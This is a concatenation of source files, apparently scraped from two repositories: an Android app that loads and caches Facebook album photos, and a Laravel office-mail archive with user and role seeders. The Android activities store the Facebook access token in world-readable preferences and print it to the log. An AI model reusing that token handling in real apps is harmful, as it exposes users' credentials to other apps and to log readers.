JSONObject JOPhoto = JAAlbumPhotos.getJSONObject(i);
photo = new Photo();
// GET THE ALBUM ID
if (JOPhoto.has("pid")) {
photo.setPhotoID(JOPhoto.getString("pid"));
} else {
photo.setPhotoID(null);
}
String returnImageURL = FBParseUtils
.extractURLFromImageObject(JOPhoto);
photo.setPhotoURL(returnImageURL);
photo.setAlbum(album);
try {
photoDAO.createOrUpdate(photo);
photoList.add(photo);
} catch (SQLException e) {
e.printStackTrace();
}
}
}
return photoList;
}
@Override
public Boolean isCached() {
try {
return photoDAO.countOf() > Long.valueOf(0);
} catch (SQLException e) {
e.printStackTrace();
}
return false;
}
@Override
public List<Photo> getAlbumPhotos(Album album) {
try {
QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
queryBuilder.where().eq(Photo.ALBUM, album);
PreparedQuery<Photo> prepQuery = queryBuilder.orderBy(Photo.ID_PK,
true).prepare();
return photoDAO.query(prepQuery);
} catch (SQLException e) {
e.printStackTrace();
}
return new ArrayList<Photo>();
}
@Override
public List<Photo> getAlbumPhotos(Album album, Integer limit) {
try {
QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
queryBuilder.where().eq(Photo.ALBUM, album);
PreparedQuery<Photo> prepQuery = queryBuilder
.orderBy(Photo.ID_PK, true).limit(Long.valueOf(limit))
.prepare();
return photoDAO.query(prepQuery);
} catch (SQLException e) {
e.printStackTrace();
}
return new ArrayList<Photo>();
}
@Override
public List<Photo> getAlbumPhotos(Album album, int direction,
Photo photo, Integer limit) {
List<Photo> result = new ArrayList<Photo>();
try {
QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
if (direction == PhotoService.BACKWARDS)
queryBuilder.where().gt(Photo.ID_PK, photo.getID()).and()
.eq(Photo.ALBUM, album);
else if (direction == PhotoService.FORWARDS)
queryBuilder.where().lt(Photo.ID_PK, photo.getID()).and()
.eq(Photo.ALBUM, album);
else
throw new SQLException();
PreparedQuery<Photo> prepQuery = queryBuilder
.orderBy(Photo.ID_PK, true).limit(new Long(limit))
.prepare();
return photoDAO.query(prepQuery);
} catch (SQLException e) {
e.printStackTrace();
}
return result;
}
@Override
public Photo getLastPhoto(Album album) {
QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
try {
queryBuilder.where().eq(Photo.ALBUM, album);
PreparedQuery<Photo> prepQuery = queryBuilder.orderBy(Photo.ID_PK,
false).prepare();
Photo result = photoDAO.queryForFirst(prepQuery);
return result;
} catch (SQLException e) {
e.printStackTrace();
}
return null;
}
}
<file_sep>/src/com/lopefied/pepemon/db/DBHelper.java
package com.lopefied.pepemon.db;
import java.sql.SQLException;
import android.content.Context;
import android.database.sqlite.SQLiteDatabase;
import com.j256.ormlite.android.apptools.OrmLiteSqliteOpenHelper;
import com.j256.ormlite.dao.Dao;
import com.j256.ormlite.support.ConnectionSource;
import com.j256.ormlite.table.TableUtils;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
/**
*
* @author lemano
*
*/
public class DBHelper extends OrmLiteSqliteOpenHelper {
private static final String DATABASE_NAME = "pepemon_database.db";
private static final int DATABASE_VERSION = 1;
private Dao<Album, Integer> albumTable = null;
private Dao<Photo, Integer> photoTable = null;
private ConnectionSource connectionSource = null;
public DBHelper(Context context) {
super(context, DATABASE_NAME, null, DATABASE_VERSION);
}
@Override
public void onCreate(SQLiteDatabase db, ConnectionSource connectionSource) {
this.connectionSource = connectionSource;
try {
TableUtils.createTable(connectionSource, Album.class);
TableUtils.createTable(connectionSource, Photo.class);
} catch (SQLException e) {
throw new RuntimeException(e);
}
}
@Override
public void onUpgrade(SQLiteDatabase db, ConnectionSource connectionSource,
int oldVersion, int newVersion) {
}
public Dao<Album, Integer> getAlbumDao() throws SQLException {
if (albumTable == null) {
albumTable = getDao(Album.class);
}
return albumTable;
}
public Dao<Photo, Integer> getPhotoDao() throws SQLException {
if (photoTable == null) {
photoTable = getDao(Photo.class);
}
return photoTable;
}
}<file_sep>/src/com/lopefied/pepemon/task/GetAlbumsTask.java
package com.lopefied.pepemon.task;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.HttpResponse;
import org.apache.http.HttpStatus;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.util.EntityUtils;
import org.json.JSONArray;
import org.json.JSONObject;
import android.app.ProgressDialog;
import android.os.AsyncTask;
import com.lopefied.pepemon.db.model.Album;
/**
*
* @author <NAME>
*
*/
public class GetAlbumsTask extends AsyncTask<String, Void, List<Album>> {
public static final String PEPEMON_ID = "pepemon2";
private ProgressDialog progressDialog;
private IAlbumDownloader albumDownloader;
private Boolean stopLoadingData;
private Boolean loadingMore;
public GetAlbumsTask(IAlbumDownloader albumDownloader,
ProgressDialog progressDialog) {
this.albumDownloader = albumDownloader;
this.progressDialog = progressDialog;
}
@Override
protected void onPreExecute() {
// SHOW THE PROGRESS BAR (SPINNER) WHILE LOADING ALBUMS
progressDialog.show();
}
@Override
protected List<Album> doInBackground(String... params) {
List<Album> albumList = new ArrayList<Album>();
// CHANGE THE LOADING MORE STATUS TO PREVENT DUPLICATE CALLS FOR
// MORE DATA WHILE LOADING A BATCH
loadingMore = true;
// SET THE INITIAL URL TO GET THE FIRST LOT OF ALBUMS
String URL = params[0];
try {
HttpClient hc = new DefaultHttpClient();
HttpGet get = new HttpGet(URL);
HttpResponse rp = hc.execute(get);
if (rp.getStatusLine().getStatusCode() == HttpStatus.SC_OK) {
String queryAlbums = EntityUtils.toString(rp.getEntity());
JSONObject JOTemp = new JSONObject(queryAlbums);
JSONArray JAAlbums = JOTemp.getJSONArray("data");
if (JAAlbums.length() == 0) {
stopLoadingData = true;
albumDownloader.noMoreAlbums();
} else {
Album albums;
for (int i = 0; i < JAAlbums.length(); i++) {
JSONObject JOAlbums = JAAlbums.getJSONObject(i);
if (JOAlbums.has("link")) {
albums = new Album();
// GET THE ALBUM ID
if (JOAlbums.has("id")) {
albums.setAlbumID(JOAlbums.getString("id"));
} else {
albums.setAlbumID(null);
}
// GET THE ALBUM NAME
if (JOAlbums.has("name")) {
albums.setAlbumName(JOAlbums.getString("name"));
} else {
albums.setAlbumName(null);
}
// GET THE ALBUM COVER PHOTO
if (JOAlbums.has("cover_photo")) {
albums.setAlbumCover("https://graph.facebook.com/"
+ JOAlbums.getString("cover_photo")
+ "/picture?type=normal"
+ "&access_token="
+ albumDownloader.getFBAccessToken());
} else {
albums.setAlbumCover("https://graph.facebook.com/"
+ JOAlbums.getString("id")
+ "/picture?type=album"
+ "&access_token="
+ albumDownloader.getFBAccessToken());
}
// GET THE ALBUM'S PHOTO COUNT
if (JOAlbums.has("count")) {
albums.setAlbumPhotoCount(JOAlbums
.getString("count"));
} else {
albums.setAlbumPhotoCount("0");
}
albumList.add(albums);
}
}
}
}
} catch (Exception e) {
e.printStackTrace();
}
return albumList;
}
@Override
protected void onPostExecute(List<Album> albumList) {
// // SET THE ADAPTER TO THE LISTVIEW
// lv.setAdapter(adapter);
// CHANGE THE LOADING MORE STATUS
loadingMore = false;
// HIDE THE PROGRESS BAR (SPINNER) AFTER LOADING ALBUMS
progressDialog.hide();
albumDownloader.foundAlbums(albumList);
albumDownloader.noMoreAlbums();
}
public interface IAlbumDownloader {
public String getFBAccessToken();
public void noMoreAlbums();
public void foundAlbums(List<Album> albumList);
}
}<file_sep>/src/com/lopefied/pepemon/service/AlbumService.java
package com.lopefied.pepemon.service;
import java.util.List;
import org.json.JSONException;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
public interface AlbumService {
/**
* Converts a json string as a json array
*
* @param response
* @return
*/
public List<Album> processJSONArrayResponse(String response,
String accessToken, String facebookID)
throws NoAlbumExistsException, JSONException;
public Boolean isCached();
public List<Album> getAlbums();
public Album getAlbum(String albumID) throws NoAlbumExistsException;
}
<file_sep>/src/com/lopefied/pepemon/AlbumPhotosActivity.java
package com.lopefied.pepemon;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import android.app.Activity;
import android.app.ProgressDialog;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.util.Log;
import android.view.Window;
import android.widget.AbsListView;
import android.widget.AbsListView.OnScrollListener;
import android.widget.ListView;
import android.widget.Toast;
import com.j256.ormlite.android.apptools.OpenHelperManager;
import com.lopefied.pepemon.adapter.PhotoListAdapter;
import com.lopefied.pepemon.adapter.PhotoListAdapter.IPhotoListAdapter;
import com.lopefied.pepemon.db.DBHelper;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.provider.impl.AlbumPhotosProviderImpl;
import com.lopefied.pepemon.service.AlbumService;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
import com.lopefied.pepemon.service.impl.AlbumServiceImpl;
import com.lopefied.pepemon.service.impl.PhotoServiceImpl;
/**
*
* @author <NAME>
*
*/
public class AlbumPhotosActivity extends Activity {
public static final String TAG = AlbumPhotosActivity.class.getSimpleName();
public static final String ALBUM_ID = "album_id";
private static final int POSITION_TO_LOAD = 2;
private SharedPreferences mPrefs;
private ListView listView;
private Integer currentPage = 0;
private String albumID = null;
private String accessToken = null;
private ProgressDialog progressDialog;
private PhotoListAdapter adapter;
private AlbumPhotosProvider albumPhotosProvider;
private PhotoService photoService;
private AlbumService albumService;
private AlbumPhotosListener albumPhotosListener;
private Album album;
private DBHelper dbHelper;
@Override
public void onCreate(Bundle savedInstanceState) {
requestWindowFeature(Window.FEATURE_NO_TITLE);
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
init();
}
@Override
protected void onPause() {
super.onPause();
adapter.clearCache();
}
@Override
protected void onResume() {
super.onResume();
adapter.notifyDataSetChanged();
}
@Override
protected void onDestroy() {
super.onDestroy();
if (dbHelper != null) {
OpenHelperManager.releaseHelper();
dbHelper = null;
}
}
private void initExtras() {
Bundle extras = getIntent().getExtras();
if (extras != null) {
albumID = extras.getString(ALBUM_ID);
Log.i(TAG, "Got albumID : " + albumID);
/*
* Get existing access_token if any
*/
mPrefs = getSharedPreferences("com.lopefied.pepemon",
MODE_WORLD_READABLE);
accessToken = mPrefs.getString("access_token", null);
Log.i(TAG, "Got access token : " + accessToken);
}
}
private void initViews() {
progressDialog = new ProgressDialog(this);
listView = (ListView) findViewById(R.id.listView);
final String accessToken = mPrefs.getString("access_token", null);
IPhotoListAdapter albumListAdapterListener = new IPhotoListAdapter() {
@Override
public String getFBToken() {
return accessToken;
}
@Override
public void selectPhoto(Photo photo) {
Intent intent = new Intent();
intent.setClass(getApplicationContext(),
ViewPhotoFragmentActivity.class);
intent.putExtra(ViewPhotoFragmentActivity.PHOTO_URL,
photo.getPhotoURL());
intent.putExtra(ViewPhotoFragmentActivity.ALBUM_ID, albumID);
intent.putExtra(ViewPhotoFragmentActivity.CURRENT_PHOTO_ID,
photo.getID());
startActivity(intent);
}
};
adapter = new PhotoListAdapter(this, R.layout.item_album,
new ArrayList<Photo>(), albumListAdapterListener);
listView.setAdapter(adapter);
listView.setOnScrollListener(new OnScrollListener() {
@Override
public void onScrollStateChanged(AbsListView arg0, int arg1) {
}
@Override
public void onScroll(AbsListView listView, int firstVisibleItem,
int visibleItemCount, int totalItemCount) {
switch (listView.getId()) {
case R.id.listView:
final int lastItem = firstVisibleItem + visibleItemCount;
if ((lastItem >= totalItemCount - POSITION_TO_LOAD)
&& (totalItemCount != 0)) {
Photo lastPhoto = (Photo) listView.getAdapter()
.getItem(totalItemCount - 1);
if (lastPhoto != null) {
if (!albumPhotosProvider.isDownloading()) {
currentPage = totalItemCount;
albumPhotosProvider.loadMore(
albumPhotosListener, lastPhoto, album,
currentPage);
}
}
}
}
}
});
}
private void initProviders() {
dbHelper = (DBHelper) OpenHelperManager.getHelper(this, DBHelper.class);
progressDialog.setCancelable(false);
progressDialog.setMessage("Downloading photos..");
progressDialog
.setProgressStyle(ProgressDialog.THEME_DEVICE_DEFAULT_DARK);
progressDialog.setProgress(0);
progressDialog.setMax(100);
albumPhotosListener = new AlbumPhotosListener() {
@Override
public void noMorePhotos() {
progressDialog.dismiss();
Toast.makeText(getApplicationContext(), "No more photos",
Toast.LENGTH_SHORT).show();
}
@Override
public void error(String message) {
Toast.makeText(getApplicationContext(), message,
Toast.LENGTH_SHORT).show();
}
@Override
public void addNewPhotos(List<Photo> photoList) {
Log.i(TAG, "Received photos : " + photoList.size());
if (photoList.size() > 0) {
loadPhotos(photoList);
} else {
Toast.makeText(getApplicationContext(),
"No more photos to load", Toast.LENGTH_SHORT).show();
}
}
@Override
public void startingDownload() {
Toast.makeText(getApplicationContext(),
"Loading more photos..", Toast.LENGTH_SHORT).show();
}
};
try {
photoService = new PhotoServiceImpl(dbHelper.getPhotoDao());
albumService = new AlbumServiceImpl(dbHelper.getAlbumDao());
albumPhotosProvider = new AlbumPhotosProviderImpl(photoService,
progressDialog, accessToken);
album = albumService.getAlbum(albumID);
albumPhotosProvider.loadInit(albumPhotosListener, album);
} catch (SQLException e) {
e.printStackTrace();
} catch (NoAlbumExistsException e) {
e.printStackTrace();
}
}
private void init() {
initExtras();
initViews();
if (albumID != null) {
initProviders();
} else {
Log.e(TAG, "Null album ID received");
}
}
private void loadPhotos(List<Photo> photoList) {
adapter.addAll(photoList);
adapter.notifyDataSetChanged();
}
}
<file_sep>/src/com/lopefied/pepemon/ViewPhotoFragmentActivity.java
package com.lopefied.pepemon;
import java.sql.SQLException;
import java.util.List;
import android.app.ProgressDialog;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.v4.app.FragmentActivity;
import android.support.v4.view.ViewPager;
import android.support.v4.view.ViewPager.OnPageChangeListener;
import android.util.Log;
import android.view.Window;
import android.widget.Toast;
import com.j256.ormlite.android.apptools.OpenHelperManager;
import com.lopefied.pepemon.db.DBHelper;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.fragment.ViewPhotoFragmentAdapter;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.provider.impl.AlbumPhotosProviderImpl;
import com.lopefied.pepemon.service.AlbumService;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
import com.lopefied.pepemon.service.impl.AlbumServiceImpl;
import com.lopefied.pepemon.service.impl.PhotoServiceImpl;
/**
*
* @author <NAME>
*
*/
public class ViewPhotoFragmentActivity extends FragmentActivity {
public static final String TAG = ViewPhotoFragmentActivity.class
.getSimpleName();
public static final String ALBUM_ID = "album_id";
public static final String PHOTO_URL = "photo_url";
public static final String CURRENT_PHOTO_ID = "photo_fb_id";
private static final int POSITION_TO_LOAD = 2;
private SharedPreferences mPrefs;
private ViewPhotoFragmentAdapter fragmentAdapter;
private ViewPager mViewPager;
private Album album;
private DBHelper dbHelper;
private PhotoService photoService;
private AlbumService albumService;
private String accessToken;
private AlbumPhotosProvider albumPhotosProvider;
private ProgressDialog progressDialog;
private AlbumPhotosListener albumPhotosListener;
@Override
public void onCreate(Bundle savedInstanceState) {
requestWindowFeature(Window.FEATURE_NO_TITLE);
super.onCreate(savedInstanceState);
setContentView(R.layout.view_photo_main);
mPrefs = getSharedPreferences("com.lopefied.pepemon",
MODE_WORLD_READABLE);
Bundle extras = getIntent().getExtras();
String albumID = extras.getString(ALBUM_ID);
Integer photoID = extras.getInt(CURRENT_PHOTO_ID);
accessToken = mPrefs.getString("access_token", null);
Log.i(TAG, "Got access token : " + accessToken);
Log.i(TAG, "Got albumID : " + albumID);
Log.i(TAG, "Got photoID : " + photoID);
dbHelper = (DBHelper) OpenHelperManager.getHelper(this, DBHelper.class);
try {
albumService = new AlbumServiceImpl(dbHelper.getAlbumDao());
photoService = new PhotoServiceImpl(dbHelper.getPhotoDao());
album = albumService.getAlbum(albumID);
List<Photo> photos = photoService.getAlbumPhotos(album);
fragmentAdapter = new ViewPhotoFragmentAdapter(
getSupportFragmentManager(), photos);
mViewPager = (ViewPager) findViewById(R.id.pager);
int counter = 0;
for (Photo photo : photos) {
if (photo.getID() == photoID)
break;
counter++;
}
mViewPager.setAdapter(fragmentAdapter);
mViewPager.setCurrentItem(counter);
} catch (SQLException e) {
e.printStackTrace();
} catch (NoAlbumExistsException e) {
e.printStackTrace();
}
initProvider();
}
private void initProvider() {
progressDialog = new ProgressDialog(getApplicationContext());
progressDialog.setCancelable(false);
progressDialog.setMessage("Downloading photos..");
progressDialog
.setProgressStyle(ProgressDialog.THEME_DEVICE_DEFAULT_DARK);
progressDialog.setProgress(0);
progressDialog.setMax(100);
albumPhotosProvider = new AlbumPhotosProviderImpl(photoService,
progressDialog, accessToken);
albumPhotosListener = new AlbumPhotosListener() {
@Override
public void noMorePhotos() {
progressDialog.dismiss();
Toast.makeText(getApplicationContext(), "No more photos",
Toast.LENGTH_LONG).show();
}
@Override
public void error(String message) {
Toast.makeText(getApplicationContext(), message,
Toast.LENGTH_LONG).show();
}
@Override
public void addNewPhotos(List<Photo> photoList) {
Log.i(TAG, "Received photos : " + photoList.size());
if (photoList.size() > 0) {
fragmentAdapter.addPhotos(photoList);
} else {
Toast.makeText(getApplicationContext(),
"No more photos to load", Toast.LENGTH_LONG).show();
}
}
@Override
public void startingDownload() {
Toast.makeText(getApplicationContext(),
"Loading more photos..", Toast.LENGTH_LONG).show();
}
};
mViewPager.setOnPageChangeListener(new OnPageChangeListener() {
@Override
public void onPageSelected(int position) {
Photo currentPhoto = fragmentAdapter.getPhoto(mViewPager
.getCurrentItem());
if (position > fragmentAdapter.getCount() - POSITION_TO_LOAD) {
albumPhotosProvider.loadMore(albumPhotosListener,
currentPhoto, album, fragmentAdapter.getCount());
}
}
@Override
public void onPageScrolled(int arg0, float arg1, int arg2) {
}
@Override
public void onPageScrollStateChanged(int arg0) {
}
});
}
}
<file_sep>/src/com/lopefied/pepemon/util/ImageUtils.java
package com.lopefied.pepemon.util;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.List;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.content.res.Resources;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.Matrix;
import android.media.ExifInterface;
import android.net.Uri;
import android.util.Log;
import android.widget.ImageView;
/**
* @author <NAME>
*/
public class ImageUtils {
public static final String TAG = ImageUtils.class.getSimpleName();
public static Bitmap decodeSampledBitmapFromResource(Resources res,
int resId, int reqWidth, int reqHeight) {
// First decode with inJustDecodeBounds=true to check dimensions
final BitmapFactory.Options options = new BitmapFactory.Options();
options.inJustDecodeBounds = true;
BitmapFactory.decodeResource(res, resId, options);
// Calculate inSampleSize
options.inSampleSize = calculateInSampleSize(options, reqWidth,
reqHeight);
// Decode bitmap with inSampleSize set
options.inJustDecodeBounds = false;
return BitmapFactory.decodeResource(res, resId, options);
}
public static int calculateInSampleSize(BitmapFactory.Options options,
int reqWidth, int reqHeight) {
// Raw height and width of image
final int height = options.outHeight;
final int width = options.outWidth;
int inSampleSize = 1;
if (height > reqHeight || width > reqWidth) {
if (width > height) {
inSampleSize = Math.round((float) height / (float) reqHeight);
} else {
inSampleSize = Math.round((float) width / (float) reqWidth);
}
}
return inSampleSize;
}
public static Bitmap decodeFile(Resources res, int resId, int reqWidth,
int reqHeight) {
// Decode image size
BitmapFactory.Options o = new BitmapFactory.Options();
o.inJustDecodeBounds = true;
BitmapFactory.decodeResource(res, resId, o);
// The new size we want to scale to
final int REQUIRED_SIZE = 70;
// Find the correct scale value. It should be the power of 2.
int scale = 1;
while (o.outWidth / scale / 2 >= REQUIRED_SIZE
&& o.outHeight / scale / 2 >= REQUIRED_SIZE)
scale *= 2;
// Decode with inSampleSize
BitmapFactory.Options o2 = new BitmapFactory.Options();
o2.inSampleSize = scale;
return BitmapFactory.decodeResource(res, resId, o2);
}
public static Bitmap toBitmap(String directory, Integer width,
Integer height, Integer rotate) {
Log.i(TAG, "Received width : " + width + " height : " + height);
BitmapFactory.Options bmOptions = new BitmapFactory.Options();
bmOptions.inJustDecodeBounds = true;
BitmapFactory.decodeFile(directory, bmOptions);
int photoW = bmOptions.outWidth;
int photoH = bmOptions.outHeight;
// Determine how much to scale down the image
int scaleFactor = Math.min(photoW / width, photoH / height);
// Decode the image file into a Bitmap sized to fill the
// View
bmOptions.inJustDecodeBounds = false;
bmOptions.inSampleSize = scaleFactor;
bmOptions.inPurgeable = true;
Bitmap bitmap = BitmapFactory.decodeFile(directory, bmOptions);
Matrix rotateRight = new Matrix();
rotateRight.preRotate(rotate);
bitmap = Bitmap.createBitmap(bitmap, 0, 0, bitmap.getWidth(),
bitmap.getHeight(), rotateRight, true);
return bitmap;
}
public static void saveAndCompressImageToSDCard(Bitmap bitmap, File file) {
Log.i(TAG, "Photo size : " + file.getTotalSpace());
try {
FileOutputStream fs = new FileOutputStream(file);
bitmap.compress(Bitmap.CompressFormat.PNG, 90, fs);
fs.flush();
fs.close();
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
Log.i(TAG, "Compressed photo size : " + file.getTotalSpace());
}
public static boolean isIntentAvailable(Context context, String action) {
final PackageManager packageManager = context.getPackageManager();
final Intent intent = new Intent(action);
List<ResolveInfo> list = packageManager.queryIntentActivities(intent,
PackageManager.MATCH_DEFAULT_ONLY);
return list.size() > 0;
}
public static int getCameraPhotoOrientation(Context context, Uri imageUri,
String imagePath) {
int rotate = 0;
try {
context.getContentResolver().notifyChange(imageUri, null);
File imageFile = new File(imagePath);
ExifInterface exif = new ExifInterface(imageFile.getAbsolutePath());
int orientation = exif.getAttributeInt(
ExifInterface.TAG_ORIENTATION,
ExifInterface.ORIENTATION_NORMAL);
switch (orientation) {
case ExifInterface.ORIENTATION_ROTATE_270:
rotate = 270;
break;
case ExifInterface.ORIENTATION_ROTATE_180:
rotate = 180;
break;
case ExifInterface.ORIENTATION_ROTATE_90:
rotate = 90;
break;
}
Log.v(TAG, "Exif orientation: " + orientation);
} catch (Exception e) {
e.printStackTrace();
}
return rotate;
}
}
<file_sep>/src/com/lopefied/pepemon/fragment/ViewPhotoFragmentAdapter.java
package com.lopefied.pepemon.fragment;
import java.util.List;
import com.lopefied.pepemon.db.model.Photo;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.support.v4.app.FragmentStatePagerAdapter;
public class ViewPhotoFragmentAdapter extends FragmentStatePagerAdapter {
private List<Photo> photos;
public ViewPhotoFragmentAdapter(FragmentManager fm, List<Photo> photos) {
super(fm);
this.photos = photos;
}
@Override
public Fragment getItem(int i) {
Fragment fragment = new PhotoFragment();
if (i < getCount()) {
Bundle args = new Bundle();
args.putString(PhotoFragment.ARG_IMAGE_URL, photos.get(i)
.getPhotoURL());
fragment.setArguments(args);
}
return fragment;
}
public Photo getPhoto(int position) {
return photos.get(position);
}
public void addPhotos(List<Photo> photos) {
this.photos.addAll(photos);
}
@Override
public int getCount() {
return photos.size();
}
} | d2ed31c2c2fb42417e10f44ec615a4485d3ec2ba | [
"Java"
] | 13 | Java | z0lope0z/pepemon | 297ae4de7238c54550961482cbb8f2c705e4d7f5 | f997c03fb7801bde72f5bfbab616e12506b98126 |
refs/heads/master | <file_sep><?php
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
class RoleSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
DB::table('roles')->insert([
'role' => 'Ketua BPS',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. TU',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Produksi',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Sosial',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Distribusi',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. Nerwilis',
]);
DB::table('roles')->insert([
'role' => 'Sub. Bag. Kasie. IPDS',
]);
DB::table('roles')->insert([
'role' => 'Resepsionis',
]);
}
}
<file_sep><?php
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Hash;
class UserSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'Daigo',
'role_id' =>'1',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User',
'role_id' =>'2',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::<PASSWORD>('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'diablo',
'role_id' =>'3',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User2',
'role_id' =>'4',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User3',
'role_id' =>'5',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User4',
'role_id' =>'6',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'user5',
'role_id' =>'7',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
DB::table('users')->insert([
'email' =>'<EMAIL>',
'name' =>'User6',
'role_id' =>'8',
'nip' =>'172410101135',
'phone' =>'888777444333',
'alamat' =>'Jatigono',
'foto' =>'default.jpg',
'password' =>Hash::make('<PASSWORD>'),
]);
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use App\Arsip;
use File;
class HomeController extends Controller
{
/**
* Create a new controller instance.
*
* @return void
*/
public function __construct()
{
$this->middleware('auth');
}
/**
* Show the application dashboard.
*
* @return \Illuminate\Contracts\Support\Renderable
*/
public function index()
{
$count = Disposisi::where('status',1)->count();
$hitung = Disposisi::where('status',2)->count();
$masuk = Arsip::where('jenis_surat', "surat masuk")->where('kepada', auth()->user()->role->role)->count();
$keluar = Arsip::where('jenis_surat', "surat keluar")->where('kepada', auth()->user()->role->role)->count();
$dis= Disposisi::all()->where('kepada', auth()->user()->role->role)->count();
$arsip= Arsip::all()->where('dari', auth()->user()->role->role)->count();
$disposisi = Disposisi::all();
return view('home', compact('disposisi', 'masuk', 'keluar', 'dis', 'arsip', 'hitung'))->with('count', $count);
// return view('home');
}
}
<file_sep><?php
use Illuminate\Support\Facades\Schema;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Database\Migrations\Migration;
class Disposisi extends Migration
{
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('disposisi', function (Blueprint $table) {
$table->bigIncrements('id');
$table->string('surat_dari');
$table->date('tgl_surat');
$table->date('tgl_terima');
$table->string('no_surat');
$table->unsignedBigInteger('no_agenda');
$table->string('perihal');
$table->string('aktor');
$table->unsignedBigInteger('status');
$table->enum('kepada',['Sdr. Ka. Sub. Bag. TU','Sdr. Ka. Sub. Bag. Kasie Produksi','Sdr. Ka. Sub. Bag. Kasie Sosial','Sdr. Ka. Sub. Bag. Kasie Distribusi','Sdr. Ka. Sub. Bag. Kasie Nerwilis','Sdr. Ka. Sub. Bag. Kasie IPDS']);
$table->text('isi_disposisi');
$table->string('diteruskan_kpd');
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
//
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use\App\User;
use\App\Disposisi;
use\File;
class UserController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function __construct()
{
$this->middleware('auth');
}
public function index()
{
$count = Disposisi::where('status',1)->count();
$user = User::all();
$disposisi = Disposisi::all();
return view('ketua_tu.user', compact('user', 'disposisi'))->with('count', $count);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function tambah(){
$acak = User::all()->count();
$count = Disposisi::where('status',1)->count();
$user = User::all();
$disposisi = Disposisi::all();
return view('/ketua_tu/create', compact('count', 'disposisi', 'acak'))->with('count', $count);
}
public function create(Request $request)
{
$this->validate($request,[
'name' => ['required'],
'role_id' => ['required'],
'nip' => ['required'],
'email' => ['required'],
]);
User::create([
'name' => $request->name,
'role_id' => $request->role_id,
'nip' => $request->nip,
'email' => $request->email,
'foto' => 'default.jpg'
]);
return redirect('user');
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
